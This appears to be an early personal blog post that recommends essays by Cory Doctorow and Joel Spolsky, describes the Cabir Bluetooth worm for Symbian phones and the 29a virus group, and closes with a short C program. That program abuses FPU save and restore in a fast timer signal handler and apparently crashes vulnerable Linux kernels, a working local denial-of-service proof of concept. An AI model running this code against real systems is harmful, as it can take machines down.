Recent must-reads

Most of you will already have read these, but this is really the stuff of legends.

• Cory Doctorow - "uber-geek", sci-fi author and EFF activist - goes to Microsoft and tells them why DRM is bad.
  


• Joel Spolsky - New York-based programmer, Software Design/Usability Guru - writes with immense insight and clarity about how Microsoft lost the "API war" - a seminal essay doing the weblog rounds these days.
  

This stuff is good, man.

Cabir.

Detected recently by the Russian Antivirus firm Kasparsky, EPOC.Cabir is supposedly the first network worm that infects mobile phones. Well, it has to be a smartphone. Running Nokia's series 60 platform. With Bluetooth.

Still a first.

The author goes by the handle "Vallez", and is reportedly a member of an international group of virus-writers called 29a. These folks specialize in "Proof of Concept" viruses.
Previous achievements?

• Cap - The first Word macro virus that spread on a global scale.


• Stream - The first virus to use a "feature" of NTFS, streams¹, as its method of infection.


• Donut - The first virus for the .NET platform(written in IL). +1 for the name.


• Rugrat - The first Win64 virus.

What does it do? Well, "Hello World!" in virii-speak. It's transmitted as an SIS (Symbian Installation File)² file, which when launched, disguised as a phone Security Manager Utility(touche), displays "Caribe" on the screen. The worm's code has been pronounced harmless, after initial analysis.

What's interesting is that it spreads through bluetooth. It will infect any bluetooth enabled device within range, even a printer. What's interesting about that is that this quite literally means that it can spread like a real virus. It can jump to any bluetooth enabled device in the vicinity. This inevitably brings futuristic scenarios to my mind. Hordes of self-replicating virii swooping down on the WiFi hotspot that is the entire planet, gadgets of the world uniting under one swarm-consciousness and rebelling against their human overlords.
Hail the Drones!

---

[1] This strikes me as a remarkably brain-dead idea to implement, in an already exploit-prone environment. (Inspired by a "+4 Funny" comment on /., and I quote: Is there some way we can work a random, irrelevant Microsoft bash into this discussion about viruses? )
[2] Well, it prompts the user to go on with the installation, which is technically not very virii-like.

  #include <sys/time.h>

  #include <signal.h>

  #include <unistd.h>

  

  static void Handler(int ignore)

  {

   char fpubuf[108];

   __asm__ __volatile__ ("fsave %0\n" : : "m"(fpubuf));

   write(2, "*", 1);

   __asm__ __volatile__ ("frstor %0\n" : : "m"(fpubuf));

  }

  

  int main(int argc, char *argv[])

  {

   struct itimerval spec;

   signal(SIGALRM, Handler);

   spec.it_interval.tv_sec=0;

   spec.it_interval.tv_usec=100;

   spec.it_value.tv_sec=0;

   spec.it_value.tv_usec=100;

   setitimer(ITIMER_REAL, &spec, NULL);

   while(1)

    write(1, ".", 1);

  

   return 0;

  }

'Nuff said.

(Couldn't entirely follow the diagnosis. A problem with the FPU exception handler. Link.)